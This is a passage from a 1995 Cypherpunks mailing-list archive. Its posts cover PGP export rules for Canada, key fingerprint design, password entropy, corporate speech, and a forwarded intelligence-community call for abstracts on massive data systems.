> >who's said in public that clipper is unrealistic.
> 
> And where does that get us? Did Newt stop the Exon bill in its tracks?
> Did he do anything to stop the wiretap bill?

And what did any of the Democrats do?

Anyone who thinks that Democrats are "better" for privacy and personal
freedom than Republicans has probably been taking very high quality
drugs indeed. A Democratic president has been pushing Clipper --
Senator Exon is a Democrat.


.pm





From x93ojg at juliet.stfx.ca  Wed Nov 22 12:44:54 1995
From: x93ojg at juliet.stfx.ca (Still)
Date: Thu, 23 Nov 1995 04:44:54 +0800
Subject: PGP
Message-ID: <Pine.A32.3.91.951122154553.3843A-100000@juliet.stfx.ca>


Does anyone know what the laws are regarding the export of PGP into 
Canada?  I know that it is not allowed to exported overseas but what is 
the ruling on into Canada.  Some sites say that it can be exported into 
Canada and others say that it can't.  Can anyone out there give me some 
information on this topic?

--

	     T H E  M A N , T H E  M Y T H , T H E  L E G E N D . 
******************************************************************************
* Dylan "Still" Boudreau	* Knowledge is proud that she knows so much; *
* Internet: x93ojg at stfx.ca	* Wisdom is humble that she knows no more.   *
******************************************************************************
*       Homepage: http://juliet.stfx.ca/people/stu/x93ojg/welcome.html       *  
******************************************************************************

		When someone says, "That's a good question." 
		 You can be sure it's a lot better than the 
		         answer you're going to get.







From x93ojg at juliet.stfx.ca  Wed Nov 22 12:52:36 1995
From: x93ojg at juliet.stfx.ca (Still)
Date: Thu, 23 Nov 1995 04:52:36 +0800
Subject: PROPOSAL: cypherpunks-news@toad.com?
In-Reply-To: <9510228170.AA817074264@cc3.dttus.com>
Message-ID: <Pine.A32.3.91.951122161441.3843B-100000@juliet.stfx.ca>


On Wed, 22 Nov 1995, Martin Diehl wrote:

>      My vote, for what it's worth, is don't split the list.  It won't work 
>      because the extra posts ARE going to go to this list because that's 
>      where they believe their readers are.
>      

I have got to agree with Martin.  If you split the group a lot of us a 
going to subscribe to both groups so when people submit this stuff and 
cross post it we are going to get two copies of the same message.  I 
think I can speak for most people when I say that I don't need that extra 
mail volume.


--

	     T H E  M A N , T H E  M Y T H , T H E  L E G E N D . 
******************************************************************************
* Dylan "Still" Boudreau	* Knowledge is proud that she knows so much; *
* Internet: x93ojg at stfx.ca	* Wisdom is humble that she knows no more.   *
******************************************************************************
*       Homepage: http://juliet.stfx.ca/people/stu/x93ojg/welcome.html       *  
******************************************************************************

		When someone says, "That's a good question." 
		 You can be sure it's a lot better than the 
		         answer you're going to get.







From raph at c2.org  Wed Nov 22 12:59:14 1995
From: raph at c2.org (Raph Levien)
Date: Thu, 23 Nov 1995 04:59:14 +0800
Subject: Design proposal: crypto-capable generic interface
In-Reply-To: <9511221840.AA24587@tis.com>
Message-ID: <Pine.SUN.3.91.951122111513.7498C-100000@infinity.c2.org>




On Wed, 22 Nov 1995, Carl Ellison wrote:

> >Date: Wed, 22 Nov 1995 10:11:00 -0800 (PST)
> >From: Raph Levien <raph at c2.org>
> >Subject: Re: Design proposal: crypto-capable generic interface
> >Message-Id: <Pine.SUN.3.91.951122094209.29001A-100000 at infinity.c2.org>
> 
> 
> 
> >   In restrospect, "daemon" was a poor choice of words to describe my
> >proposal. "Slave process" gets the idea across much better, 
> 
> I'm a great fan of programming by cooperating processes -- but I still
> worry when it comes to crypto.  What we need to do, if we want real
> security, is hold all the crypto secrets (therefore the crypto itself) in a
> device (PCMCIA card?)  in the physical posession of the user.  The
> cooperating-process model could make that easier -- but, if designed wrong,
> it could call for the device to give up a secret to be sent by IPC over to
> the slave process.

   What I am getting from you is "worry." This does not convince me. I
want solid technical criticism. Sorry for being so harsh, but that's how I
feel. 

   In fact, I propose that the security of the "slave process" model is
_better_ than the realistic alternatives. Without it, the application
stuff (for example, displaying pretty MIME content) and the crypto stuff
must share an address space. A bug in the application stuff could corrupt
or compromise the crypto data structures. As we have seen demonstrated
several times, it is just not practical to build large, complex
applications which are worthy of the highest level of trust. Factoring it 
into two processes helps.

   Tokens are nice, but I think there's a lot to be said for software 
solutions as well. At the very least, I don't consider the existence of 
tokens to be an argument that software crypto systems shouldn't be built.

> >> >						 This requires that
> >> >keys have some nonforgeable names, which is unfortunately not a
> >> >feature of PGP 2.6.2. S/MIME will do it just fine, if you buy into the
> >> >Certifcation Authority (<wink> at Nick Szabo).
> >> 
> >> Public keys, if that's what you're talking about, have perfectly good
> >> nonforgeable names -- themselves.  They are unique.  They are the proper
> >> name which can collect all the attributes of that key which are of interest
> >> (e.g., permission to spend $, name of a human who knows the private key,
> >> attributes about that human, etc.).
> >
> >   Ok. But public keys have one serious disadvantage: their size. 
> [...]
> 
> >   I propose using the MD5 hash of the whitespace-free MOSS 
> >representation of the public key, in hex. It's simple enough to be 
> >described in one sentence, but does everything I want.
> 
> That sounds fine -- but why deal with a text MOSS representation?  It's the
> modulus which is unique -- so just hash the binary bytes of the modulus,
> MSB first.  There's no need to force anyone checking a key to have all the
> MOSS printing software in the loop.  You might also consider using SHA
> instead of MD5 -- but that adds to the character count on your business
> card.  [I printed up my own business cards with PGP fingerprints for my 2
> primary keys -- and it took up about 1/4 of the card, in a readable font.]

   I would accept SHA as a reasonable alternative.

   Using the modulus alone is not good enough. A bogus key with the same 
modulus and a different exponent could be used to mount a 
denial-of-service attack. Note that the PGP 2.6.2 key fingerprint scheme 
suffers from a similar problem; since the sizes of the modulus and 
exponent fields are not included in the hash, it is possible to generate 
bogus keys with the same fingerprint. Specifying the key size and 
fingerprint together is, however, unforgeable.

I looked at the MOSS representation of the key (I'm talking PK's here
only, not all the X.509 stuff). I don't think it would be that hard to
code. 

> >   Note that PGP 2.6.2 does _not_ allow the use of a public key as the 
> >name of a public key, unless you do a horrible hack such as replace the 
> >pubring.pgp file with the one public key of interest.
> 
> PGP keyring structures do use the key as its own name, I believe.  The
> UserID is a separate entity, associated with the stand-alone key.  A
> signature applies to a pair (UserID,Key).

   I was referring to the interface that PGP presents to the outside 
world, not its internal keyring structures. These issues come up whenever 
using PGP from the command line, or trying to interface it with other 
applications.

> If I could change the PGP keyring structure, I'd add a new entity -- an
> Attribute block -- a string and my key ID, with a signature on the
> Attribute+ObjectKey.  This can be done today with the UserID and signature
> -- and I've even tried it.  It works, but PGP is used to accessing keys by
> the text in a UserID field and that's not appropriate.  The Attribute would
> give a statement I'm prepared to stand by, giving testimony about the key
> being signed or the person who has demonstrated the ability to sign
> something I've verified with that key.

   I understand that Matt Blaze's forthcoming "Policymaker" will do all 
this and more.

> We might need to add something like MOSS's aliases, for my use only, to let
> me access keys.  If I know someone as Bobby -- that's an association in my
> own head -- not applicable to anyone else.  When I access him by that
> alias, that's for my use.  Therefore, only I should define it and only I
> should sign the association.  This is what I'd use instead of PGP's
> UserID blocks -- alias blocks.
> 
> I commend TIS/MOSS's aliases to people's study.  The MOSS guys have used
> the alias structure not only to define nicknames of importance only to me
> but also to define crypto-lists (like mailing lists).
> 
> Needless to say, the assignment of aliases needs to be protected.  An
> attacker mustn't be allowed to slip a new alias and/or new key into your
> ring -- especially if it's a crypto-list definition.

   This is fine, but it's one more thing to manually maintain. How is the 
user going to verify that the alias is really right? This is another 
place where a 32- (or 40-) hex digit unique name would come in handy.

> >   Thanks for the suggestion. However, my concerns are with 
> >implementation and deployment, not research.  I am perfectly willing to 
> >consider cryptographic algorithms to be black boxes that do what they say 
> >they will. I think the charter exists to start a new list. John Gilmore 
> >has already offered to start a "coderpunks" list on toad.com. Shall we 
> >take him up on it?
> 
> My suggestion is that if you want this limited in content, it'll have to be
> moderated.

   I agree that a moderated list would be better, but I do not have the
time do it myself.
   One suggestion that I think is very good is to moderate on the basis 
on the basis of sender, rather than message. The best way to do this 
would be to keep a keyring of "approved" senders, and match the signature 
of each message against the keyring. As I say, I'm not volunteering, but 
if somebody else was so moved, I think it would be a valuable service.

Raph






From hfinney at shell.portal.com  Wed Nov 22 13:00:59 1995
From: hfinney at shell.portal.com (Hal)
Date: Thu, 23 Nov 1995 05:00:59 +0800
Subject: towards a theory of reputation
In-Reply-To: <Pine.SUN.3.91.951121223454.2539A-100000@eskimo.com>
Message-ID: <199511222024.MAA09897@jobe.shell.portal.com>


I don't have time to write much now, but I got a request for information
on the Prisoner's Dilemma problem, so I did a web search, and found an
interesting sounding paper at <URL:
http://www.cs.wisc.edu/~smucker/ipd-cr/ipd-cr.html>.  I have not read it
yet, but according to the web page this adds to the traditional PD
simulations the feature that participants can choose whom to interact
with (rather than having to interact with everyone or with a random other
program).  Maybe "reputation" would be more important in such a
simulation since the element of choice seems to be one of the key areas
where reputation matters.  I'll try to read the paper over the holidays,
but it sounds like it might be relevant.

Hal





From sunder at amanda.dorsai.org  Wed Nov 22 13:25:35 1995
From: sunder at amanda.dorsai.org (Ray Arachelian)
Date: Thu, 23 Nov 1995 05:25:35 +0800
Subject: Visual Basic 4.0 encryption prog.
In-Reply-To: <01BAB5D0.4CBEAEE0@king1-04.cnw.com>
Message-ID: <Pine.SUN.3.91.951122153315.26251W@amanda.dorsai.org>


On Sat, 18 Nov 1995, Eric Anderson wrote:

> 	I just scored a copy of visual basic 4.0 and I was wondering how feasible it would be to write a program for Window$ 95 that would use RSA or IDEA and the Win95 exchange interface. I plan on buying Applied Cryptography probably on Fri. when I get paid.
> 	My requirements/goals are: 100% compatibility with M$ Exchange, ease of use (Point & Click/ drag & drop) and last but not least, STRONG public key encryption using "off-the shelf
> code. 


> 	So my ??? Is this: Is it possible? Or should I just go out and buy a C++ compiler.
> I don't really care about ITAR or any of that other BS, I just won't put MY name on it.

You've already put your name on it by asking this question and providing 
so much detail on what tools you would use and what you want to do. :-)

But there is no reason why this isn't possible in ANY language.  You'll 
just have to write a lot of code by hand, or port to VB... especially the 
large-number routines.

==========================================================================
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. |   _ |>
  \|/  |sunder at dorsai.org| Where day by day, yet another   |   \ |
<--+-->|                 | Constitutional right vanishes.  |    \|
  /|\  |    Just Say     |                                 |    <|\
 + v + | "No" to the NSA!| Jail the censor, not the author!|    <| n
===================http://www.dorsai.org/~sunder/=========================






From rmartin at aw.sgi.com  Wed Nov 22 13:40:00 1995
From: rmartin at aw.sgi.com (Richard Martin)
Date: Thu, 23 Nov 1995 05:40:00 +0800
Subject: PGP in Canada
In-Reply-To: <Pine.A32.3.91.951122154553.3843A-100000@juliet.stfx.ca>
Message-ID: <9511221544.ZM6977@glacius.alias.com>



-----BEGIN PGP SIGNED MESSAGE-----

<fearing the wrath of the cpunks, but deciding that it's better to get this
`sorted out' than keep on being wrong>

Please take all of the following as being mystatements of
what I think, not statements of absolute truth. [That is,
call the CEC yourself.]

It is legal for a Canadian citizen to import PGP into Canada
under Canadian law. It is legal to use either the international
or yanqui versions in Canada--software patents don't apply [I
don't think].

It is legal for an American to give pgp to an American citizen,
a permanent legal resident alien of the United States, or to a
Canadian citizen, providing the receiver is in Canada or the
United States.

It is *illegal* for a Canadian to export pgp anywhere except the
U.S., if the pgp came from the U.S. and no substantial changes
have been made to it.

For more docs, see
http://www.io.org/~samwise/crypto/
[yes, I know, it hasn't changed in a while, and there's some stuff
missing [such as the Area Control List], but the most important
thing on that web page is the information about who to ask: there's
an office in Halifax]

My recommendation: get the international version of PGP. [Unless, of
course, the above statements are wrong, in which case my reasoning
in favour of the international version are faulty.]

richard

- --
Richard Martin                           I DON'T SPEAK FOR ALIAS|WAVEFRONT
Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team]
rmartin at aw.sgi.com/g4frodo at cdf.toronto.edu      http://www.io.org/~samwise
Trinity College UofT ChemPhysCompSci 9T7+PEY=9T8 Shad Valley Waterloo 1992

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLOLkh1gtCYLvIJ1AQHkfAQAkz8HnhxC0S59PHCajFQYGjp1dCVNzbf2
JZnv4epN/KSr6K1f/v2fLF9PoCylADHulHze/oeN1T3gEel6MfNQheZTFofu3381
y9O39q4lmRyS6YrL07T9A3hr3taCrx3W9L7HZancKmKQk1EyNHgG+0ECiDR20Lp9
H0AyGkGSmng=
=hN9v
-----END PGP SIGNATURE-----





From sjb at universe.digex.net  Wed Nov 22 13:43:33 1995
From: sjb at universe.digex.net (Scott Brickner)
Date: Thu, 23 Nov 1995 05:43:33 +0800
Subject: Repeated Words/characters in Password/Phrase
In-Reply-To: <acce4e6b00021004573a@[205.199.118.202]>
Message-ID: <199511222102.QAA10377@universe.digex.net>


Timothy C. May writes:
>At 11:11 PM 11/14/95, Ted Cabeen wrote:
>>Do repeated words in a PGP passphrase make the pass phrase less secure than
>>a passphrase without any repeated words?  And on the same note, do repeated
>>letters in a UNIX password make that password easier to break? I can't seem
>>to find anything in my books on cryptography that mention this.  Thanks.
>
>More of an information theory question than a crypto question. There are no
>simple answers to this question, but some examples will help:
>
>The password "foo" is not very good, and "foofoo" is only slightly better.
>And "foofoofoo" is slightly better, and so on, to a point. But
>"foofoo....foo" is not N times better than a single "foo," because the
>_pattern_ is simply desribed: "repeat "foo" N times." Thus, the information
>content or entropy of "foofoofoo....foo" is not N times greater than the
>entropy of "foo."
>
>A some dictionary attacks which would trivially find "foo" will not find
>"foofoo," or "foofoofoo," etc., so this could be a great help. More
>sophisticated dictionary attacks may of course take the 30,000 or so most
>common names, words, places, and then do various permutations, reversals,
>repetitions, etc.
>
>So this is why there is not likely to be a simple answer to your question.
>Repeating words in a passphrase can make the passphrase easier to remember
>(such as "thequickquickbrownfox") and make certain kinds of attacks harder,
>but with not as much of an increase in entropy at the increased number of
>raw characters might otherwise suggest.
>
>Other "heuristics" (simple rules of thumb) for passphrases are contained in
>the PGP documents, and in numerous other places: avoid names, add
>nonstandard English keyboard characters liberally (even if using real
>words), etc. The "best" passphrases, it almost goes without saying, are the
>longest and most "unpredictable," so that "7f#qp)djQ10hB%3t+1?U4SVp5" is
>much superior to "%foo%foo".

I don't buy this argument.  The only reason "foofoo" could have less
entropy than "foobar" is if the attacker had some reason to know that
the user tends to choose doubled passwords, or something like that.

If the user has historically chosen passwords with roughly six bits of
entropy per character, then "foofoo" is exactly as likely as "foobar",
and is no "weaker" from an information-theoretic perspective.

In fact, information theory would generally note that discarding the
"foofoo" choice slightly reduces the entropy in the password.

It is also worth noting that any good password algorithm doesn't permit
one to determine if the password is _partly_ right, so entropy
measurements can't really meaningfully be made on a per-character
basis, only on the password as a whole.

It is because the attacker knows that many (if not most) users tend to
prefer passwords that are "easier to remember" that leads him to try
the more memorable combinations *first*.  The information-theoretic
interpretation of this is that such memorable passwords have less
entropy than the others, because the probability that the next account
an attacker tries to guess uses a memorable password is higher than the
probability that it doesn't.

"foobar" occurs as a password less frequently than "foofoo", so it has
more entropy.  The extra entropy didn't come from the use of more
characters, it came from all the more lazy users who like "foofoo"
better.

To use a variant of Tim's example, "7f#qp)djQ10hB%3t+1?U4SVp5" is not
measurably better than "7f#q#)d#Q10h#%#t+1#U4S#p5", even though the
latter uses the "#" character much more frequently than the first.
Both passwords are so far down the list that they probably have never
occurred as passwords.  Both contain effectively the same entropy.

To address the original question:
>>Do repeated words in a PGP passphrase make the pass phrase less secure than
>>a passphrase without any repeated words?

Probably not.  It may even increase security, as "the quick brown fox"
is more frequently used than "the quick quick brown fox" as someone's
password, and should, therefore, be tried first.

>>And on the same note, do repeated
>>letters in a UNIX password make that password easier to break?

Again, probably not.  If the letters are generally chosen at random,
then "abafraa" is just as likely to occur as "abifryu".  If the letters
are chosen less randomly, like from a name, then "anna" is more likely
than "xavier", but less likely than "john".





From sjb at universe.digex.net  Wed Nov 22 13:53:42 1995
From: sjb at universe.digex.net (Scott Brickner)
Date: Thu, 23 Nov 1995 05:53:42 +0800
Subject: MED_vac
In-Reply-To: <199511152004.PAA05104@ziggy.tis.com>
Message-ID: <199511222108.QAA10547@universe.digex.net>


"Thomas M. Swiss" writes:
>     A (possibly stupid) thought: could commercial key escrow help here?
>
>     I very much want hospitals to have fast access to my medical data if
>my broken and bleeding body should come through their door, even if I am
>unconscious and my personal physician cannot be reached. On the other hand,
>I don't want anyone to be snooping through them right now.

Actually, Bell Labs outlines a system which can preserve anonymity
under these circumstances in "The Use of Communications Networks to
Increase Personal Privacy In a Health Insurance Architecture" at
<URL:ftp://ftp.research.att.com/dist/anoncc/privacy.health.ps.Z>.

It's based on their anonymous credit card protocol, which is really a
sort of identity escrow service managed by a remailer.  You might find
it interesting.





From fc at all.net  Thu Nov 23 06:00:43 1995
From: fc at all.net (Dr. Frederick B. Cohen)
Date: Thu, 23 Nov 95 06:00:43 PST
Subject: Java & Netscape security [NOISE]
In-Reply-To: <30B3CE64.6BF2@netscape.com>
Message-ID: <9511231357.AA10766@all.net>


> Alice (or someone representing themselves as Alice) said:
> 
> > What I'm trying to say is that if someome posts from watson.ibm.com,
> > and IF they are talking about OS/2, we will not accept that they are
> > not speaking independantly of the knowledge they have garnered from
> > watson.
> 
> And that is understable.
> 
> > In the same way, someone who writes from Netscape.com or AT&T, or Sun
> > and tries to disclaim that they are speaking for the company, when
> > they step out as an employee of a company is deluding themselves.
> 
> This is a complete non sequitur. See if you can follow this: only those
> authorized by the company to speak for the company are authorized speak
> for the company.

This is not correct, at least according to legal precident.  If someone who
is from Sun representes themselves as being from Sun (i.e., a Sun.Com email
address in their signature line), then when they speak (or email) about Sun,
its products, its policies, etc., they represent Sun.

> There is a genuine difference between a corporate officer saying
> 
> 	The Amalgamated Widget corporate policy on stong crypto is ...
> 
> and some engineer from Amalgamated Widget saying
> 
> 	My private opinion on strong crypto is ...

There is indeed a difference, but it's not as big as you might seem to
think.  Even more importantly, there is a difference between the person
from Amalgamated Widget speaking on strong crypto and the person from
Sun speaking on Java.

> The consequence of every statement by every employee being taken as
> company policy is that every employee (except for public relations) will
> be prohibited from contributing to any public forum or even answering
> apparently innocuous questions on the net. This would not be a desirable
> outcome.

In fact, employees represent the company any time they use company
names, symbols, stationary, return addresses, etc.

If the Netscape legal staff and corporate security board haven't made
this clear to management and employees, that's pretty bad.  If the
officers of Netscape haven't taken appropriate policy measures to notify
employees of this potential liability (it appears that at least they
haven't notified Phillip), then negative consequences could result in
personal liability to the officers (a shareholder lawsuit would be the
most common cause of such liability).  As a Netscape employee, you
should immediately point this out to the corporate person you report to,
and do so in writing.

This sort of lapse is a strong indicator that inadequate IT audit has
been done in Netscape.  In a comprehensive IT audit, such policy lapses
should be identified quickly and changes in corporate policies should
follow very closely. 

> Still speaking for myself,

You are still speaking for Netscape, but hopefully after reading this
message, you and your company will realize it.

> PK
> --
> Philip L. Karlton		karlton at netscape.com
> Principal Curmudgeon		http://www.netscape.com/people/karlton
> Netscape Communications

-- 
-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From ylo at cs.hut.fi  Thu Nov 23 06:32:25 1995
From: ylo at cs.hut.fi (Tatu Ylonen)
Date: Thu, 23 Nov 95 06:32:25 PST
Subject: Design proposal: crypto-capable generic interface
In-Reply-To: <Pine.SUN.3.91.951122094209.29001A-100000@infinity.c2.org>
Message-ID: <199511231334.OAA00460@trance.olari.clinet.fi>


>    Ok. But public keys have one serious disadvantage: their size. I can't 
> put a public key on my business card or read it over the phone. I want a 
> unforgeable key name. I want this to be the standard key name in the 
> interface between the application and the crypto engine. I want users to 
> be able to specify them directly, at the very least to bootstrap the 
> public key infrastructure.

There is a patent by someone (I think it was IBM) on how to pack RSA
keys in small space.  I think they were putting them on the magnetic
strips that you have behind every card.  I'm afraid I don't have the
patent number saved, but I have seen the patent document myself at the
patent office.  No, I'm afraid I don't remember how they encoded it.

Using that method (or something similar), you could probably encode
the keys into acceptably short strings with S/KEY-style encoding.

    Tatu





From ylo at cs.hut.fi  Thu Nov 23 06:44:09 1995
From: ylo at cs.hut.fi (Tatu Ylonen)
Date: Thu, 23 Nov 95 06:44:09 PST
Subject: Intelligence Community Massive Digital Data Systems Initiative
Message-ID: <199511231246.NAA00407@trance.olari.clinet.fi>


Below is some information about the Intelligence Community Massive
Digital Data Systems Initiative.

Summary:
 - new data 2 - 5 terabytes (10^12 bytes) per day
 - total size about 20 petabytes (20 * 10^15 bytes)
 - 300 terabytes on-line, the rest accessible in a few minutes
 - funding (for the research initiative, not for the final system): 
   3-5 million USD per year estimated for investments

Now, how much is 2 - 5 terabytes per day?
  - 20 - 50.000.000 jpeg images (100kB/image, relatively high-quality) per day
  - 20 - 50.000.000 minutes of GSM-quality phone intercepts per day
  - 1.000.000 - 2.500.000 minutes of compressed (256kbit/sec) video per day
  - 1.000.000.000 - 3.000.000.000 e-mail messages per day
  - you can continue the list; most available data sets turn out to be
    much smaller

How much is 20 petabytes?  Assuming you want to collect
information about 100.000.000 people worldwide, this makes 200
megabytes per person (on the average for each of those 100 million
people).

200 megabytes per person on the average is quite a lot, since for many
of those people you probably don't have all that much data.  Maybe 90%
of the data for 10% of the people?  

(Of course, in a database like this you might also have a lot of data
like aerial imaginery, satellite imaginery, economical information,
etc., so it is a little exaggarated to talk about all of it being on
individual people.)

The full text is below.

Crypto relevance?  Makes you think whether you should protect your data.

    Tatu

From: dbowner at cs.wisc.edu ( Dbowner)
To: bal at mitre.org, mike at nobozo.CS.Berkeley.EDU, shosani at csr.lbl.gov,
        gray at sfbay.enet.dec.com, livny at cs.wisc.edu, ragrawal at almaden.ibm.com,
        manola at gte.com, heiler at gte.com, dayal at hplabs.hpl.hp.com,
        shan at hplabs.hpl.hp.com, toby at almaden.ibm.com, reiner at ksr.com,
        jag at allegra.att.com, randy at allspice.berkeley.edu, mcleod at vaxa.isi.edu,
        nick at MIMSY.CS.UMD.EDU, ake at purdue.edu, laney at ccr-p.ida.org,
        darema at watson.ibm.com, grossman at math.uic.edu, dbusa at cs.wisc.edu,
        metadata at llnl.gov, jmaitan at mosaic.uncc.edu, whm at thumper.bellcore.com
Cc: susan at mitre.org, connie at mitre.org
Subject: Call For Papers MDDS
Date: Thu, 18 Nov 93 11:08:03 EST
Resent-To: dbworld-people at cs.wisc.edu
Comments: IF YOU REPLY TO THIS MESSAGE, BE SURE TO EDIT THE to: AND cc: LISTS.
 The dbworld alias reaches many people, and should only be used for
 messages of general interest to the database community.  Mail sent
 to dbedu goes to the subset of addresses with a .edu suffix; mail
 sent to dbusa goes to the subset of US addresses.  Please use
 the smaller lists when appropriate.  Requests to
 get on or off dbworld should go to dbworld-request at cs.wisc.edu.
Reply-To: (Susan L. Hanlon) <susan at linus.mitre.org>
Resent-Reply-To: (Susan L. Hanlon) <susan at linus.mitre.org>



									3 November 1993

Dear Colleague:

Subject:  Call for Abstracts for Massive Digital Data Systems



	Future intelligence systems must effectively manage massive amounts of digital
data (i.e., multi-terabytes or greater).  Issues such as scalability, design,
and integration need to be addressed to realize a wide spectrum of intelligence
systems ranging from centralized terabyte and petabyte systems comprised of many
large objects (e.g., images) to distributed heterogeneous databases that contain
many small and large objects (e.g., text).  The Community Management Staff's
Massive Digital Data Systems (MDDS) Working Group on behalf of the intelligence
community, is sponsoring a two day invitation-only unclassified workshop on the
data management of massive digital data systems with government, industry, and
academia.

	The workshop will be held on the 1st and 2nd of February 1994 in Reston,
Virginia.  The objective of the workshop is to make industry and academia aware
of intelligence community needs, stimulate discussion of the technical issues
and possible solutions, and identify potential research efforts that warrant
further investigation for possible government funding.  The amount of funding
estimated for investments is three to five million dollars per year over the
next 2-3 years.

	Last July, a one-day, classified, government-only workshop was held to
characterize the magnitude of the problem and identify the major challenges. 
The needs, issues, and in some cases, lessons learned, were presented for
different data types including Imagery, Text, Voice, Video, and Multi-media. 
Enclosure 1, "Massive Digital Data System Issues", is an unclassified
description of the consolidated challenges.

	The Massive Digital Data Systems Working Group is soliciting one-page abstracts
related to the issues of the data management of massive digital systems
including (but not limited to) scalability, architecture and data models, and
database management functions.  The focus of the abstract should be on potential
solutions for the longer term research challenges (i.e., 5-10 years out) that
must be addressed today in order to effectively manage data of massive
proportions in the future.  The solutions need not be limited to proven
approaches today but can foster new approaches and paradigms.  Issues relating
to the storage media and analysis tools, while important to the intelligence
community, are not within the scope of the workshop.  Selection for attendance
will be based upon technical relevance, clarity, and quality of the proposed
solution.

Call for Abstracts								Page 2



	Each one-page abstract should follow the abstract format enclosed (Enclosure
2).  All submissions must be UNCLASSIFIED.  To allow enough time for proper
evaluation of each abstract, the deadline for submission is 01 December 1993. 
You will be notified of acceptance to attend by 17 December 1993.  Abstracts
should be forwarded to one of the following:

	Jackie Booth, P.O. Box 9146, Rosslyn Station, Arlington, VA   22219
	Jackie Booth, ORD/SETA, fax number (703) 351-2629
	boothj at mcl.saic.com (Internet)

	Please pass this call for abstracts on to other colleagues that are working on
solutions in this area.

	Sincerely,



	Dr. David Charvonia
	Director, Advanced Technology Office
	Community Management Staff

Enclosures:
  1.  Massive Digital Data Systems Issues
  2.  Abstract Format
	
Enclosure 2
ABSTRACT FORMAT

Title:


Author(s):

Organization/Affiliation:

Address:

Phone:					FAX:


Description:


















Status:  (Research, Prototype, Operational)


Scope:  (Size of effort in terms of dollars and/or staff months;  Size of system
in terms of amount of data, number of databases, nodes, users, etc.)


Customer:  (if applicable)


Operational Use:  (if applicable)


********************************************************************
Forward to one of the following:
	Jackie Booth, P.O. Box 9146, Rosslyn Station, Arlington, VA   22219
	Jackie Booth, ORD/SETA, fax number (703) 351-2629
	boothj at mcl.saic.com (Internet)

-------------------------------------------------------------------
MASSIVE DIGITAL DATA SYSTEMS ISSUES


EXECUTIVE SUMMARY

Future intelligence systems must effectively manage massive amounts of digital
data (i.e., multi-terabytes or greater). Issues such as scalability, design, and
integration need to be addressed to realize a wide spectrum of intelligence
systems ranging from centralized terabyte and petabyte systems comprising many
large objects (e.g. images) to distributed heterogeneous databases that contain
many small and large objects (e.g. text). Consequently, Massive Digital Data
Systems (MDDS) are needed to store, retrieve, and manage this data for the
intelligence community (IC). While several advances have been made in database
management technology, the complexity and the size of the database as well as
the unique needs of the IC require the development of novel approaches. This
paper identifies a set of data management issues for MDDS. In particular,
discussions of the scalability issues, architectural and data modeling issues,
and functional issues are given. The architectures for MDDS could be
centralized, distributed, parallel, or federated. The functions of MDDS include
query processing, browsing, transaction management, metadata management,
multimedia data processing, integrity maintenance, and realtime data processing.
Representing complex data structures, developing appropriate architectures,
indexing multimedia data, optimizing queries, maintaining caches, minimizing
secondary storage access and communications costs, enforcing integrity
constraints, meeting realtime constraints, enforcing concurrency control,
recovery, and backup mechanisms, and integrating heterogeneous schemas, are some
of the complex tasks for massive database management. The issues identified in
this paper will provide the basis for stimulating efforts in massive database
management for the IC.

1.0  INTRODUCTION	
1.1  The Challenge
The IC is challenged to store, retrieve, and manage massive amounts of digital
information. Massive Digital Data Systems (MDDS), which range from centralized
terabyte and petabyte systems containing many large objects (e.g., images) to
distributed heterogeneous databases that contain many small and large objects
(e.g., open source), are needed to manage this information. Although
technologies for storage, processing, and transmission are rapidly advancing to
support centralized and distributed database applications, more research is
still needed to handle massive databases efficiently. This paper describes
issues on data management for MDDS including scalability, architecture, data
models, and database management functions. Issues related to storage media,
analysis tools, and security while important to the IC are not within the scope
of this paper. 

The key set of data management issues for MDDS include:  

	Developing architectures for managing massive databases
	Utilizing data models for representing the complex data structures
	Formulating and optimizing queries
	Developing techniques for concurrency control and recovery
	Integrating heterogeneous schemas
	Meeting timing constraints for queries and transactions
	Indexing multimedia data
	Maintaining caches and minimizing secondary storage access and communications
costs
	Enforcing integrity constraints.

1.2  Background
The IC provides analysis on current intelligence priorities for policy makers
based upon new and historical data collected from intelligence sources and open
sources (e.g., news wire services, magazines). Not only are activities becoming
more complex, but changing demands require that the IC process different types
as well as larger volumes of data. Factors contributing to the increase in
volume include continuing improvements in collection capabilities, more
worldwide information, and open sources. At the same time, the IC is faced with
decreasing resources, less time to respond, shifting priorities, and wider
variety of interests. Consequently, the IC is taking a proactive role in
stimulating research in the efficient management of massive databases and
ensuring that IC requirements can be incorporated or adapted into commercial
products. Because the challenges are not unique to any one agency, the Community
Management Staff (CMS) has commissioned a Massive Digital Data Systems Working
Group to address the needs and to identify and evaluate possible solutions.

1.3  Assumptions and Project Requirements
Future intelligence systems must provide a full suite of services for gathering,
storing, processing, integrating, retrieving, distributing, manipulating,
sharing and presenting intelligence data. The information to be shared is
massive including multimedia data such as documents, graphics, video, and audio.
  It is desired that the systems be adapted to handle new data types.  

The goal is to be able to retain the data for potential future analysis in a
cost effective manner. The more relevant data would remain on-line, say for 5
years, organized with the most relevant data accessible in the least amount of
time. It is expected that 2 to 5 terabytes of new data has to be processed each
day.  Thus, the total size of the database (both on-line and off-line) could be
as large as 20 petabyes with about 300 terabytes of data stored on-line. It is
assumed that storage devices (primary, secondary, and even tertiary) for the
large multimedia databases as well as data pathways with the required capacity
will exist. The access times are about 5 seconds for the data less than a week
old, about 30 seconds for data under two months old, and on the order of minutes
for data up to 10 years old. 

2.0  SCALABILITY ISSUES
A particular data management approach can be scaled to manage larger and larger
databases. That is, a database can often sustain a certain amount of growth
before it becomes too large for a particular approach. For example, more memory,
storage, and processors could be added, a new hardware platform or an operating
system could be adopted, or a different microprocessor could be used (e.g. using
a 32 bit microprocessor instead of a 16 bit microprocessor). Once the size of
the database has achieved its limit with a particular approach, then a new
approach is required. This new approach could be a new architecture, a new data
model, or new algorithms to implement one or more of the functions of the
database management system (DBMS), or a combination of these features.
Discussions of these three features are given below. 

 	Architectures:  The type of architecture impacts the size and response time
of the DBMS.  
	Centralized approaches are being migrated to distributed and parallel
approaches to handle large databases.  Some architectures such as a the shared
nothing parallel architectures are scalable to thousands of processors, but will
have multiprocessor communication issues.  Current approaches need to be
assessed to determine their scalability limits.  New approaches may be required
for handling massive databases.


 	Data Models:  Data models which support a rich set of constructs are desired
for next generation database applications.  However, the search and access time
of the DBMS would depend on the data model used. For example DBMSs which support
complex data structures use large caches, access data through pointers, and work
well with large main memory in general, while DBMSs based on simpler data models
